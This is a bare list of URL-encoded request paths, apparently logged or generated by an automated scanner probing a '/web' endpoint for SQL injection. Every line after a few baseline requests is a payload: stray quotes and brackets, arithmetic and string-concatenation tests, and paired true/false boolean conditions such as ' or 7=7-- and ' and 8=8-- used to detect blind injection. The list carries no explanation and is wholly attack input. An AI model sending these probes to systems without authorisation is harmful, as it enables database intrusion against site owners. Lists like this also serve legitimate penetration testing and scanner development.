/web
/web
/web
/web
/web
/web
/web
/should_not_xist_dddddddddd
/web
/123
/'
/%22
/%c2%bf'"(
/(
/)
/2%2b1
/1%2b2
/3%2b5
/2%2b6
/3%2ba
/3%2bb
/1-1
/2-2
/11-5
/12-6
/0-a
/0-b
/w'%7c%7c'eb
/w'%2b'eb
/w'%20'eb
/w'%7c%7c'eb
/w'%2b'eb
/w'%20'eb
/w%7c%7c'eb
/w%2b'eb
/w%20'eb
/webxxx'%20or%208%3d8--
/webxxx'%20or%207%3d5--
/webxxx'%20or%207%3d7--
/webxxx'%20or%205%3d8--
/webxxx'%20or%20's'%3d's
/webxxx'%20or%20's'%3d'r
/webxxx'%20or%20't'%3d't
/webxxx'%20or%20't'%3d'r
/webxxx%22%20or%208%3d8--
/webxxx%22%20or%207%3d5--
/webxxx%22%20or%207%3d7--
/webxxx%22%20or%205%3d8--
/webxxx%22%20or%20%22s%22%3d%22s
/webxxx%22%20or%20%22s%22%3d%22r
/webxxx%22%20or%20%22t%22%3d%22t
/webxxx%22%20or%20%22t%22%3d%22r
/21%20or%208%3d8--
/21%20or%207%3d5--
/21%20or%207%3d7--
/21%20or%205%3d8--
/web'%20and%208%3d8--
/web'%20and%207%3d5--
/web'%20and%207%3d7--
/web'%20and%205%3d8--
/web'%20and%20's'%3d's
/web'%20and%20's'%3d'r
/web'%20and%20't'%3d't
/web'%20and%20't'%3d'r
/web%22%20and%208%3d8--
/web%22%20and%207%3d5--
/web%22%20and%207%3d7--
/web%22%20and%205%3d8--
/web%22%20and%20%22s%22%3d%22s
/web%22%20and%20%22s%22%3d%22r
/web%22%20and%20%22t%22%3d%22t
/web%22%20and%20%22t%22%3d%22r
/web
/web
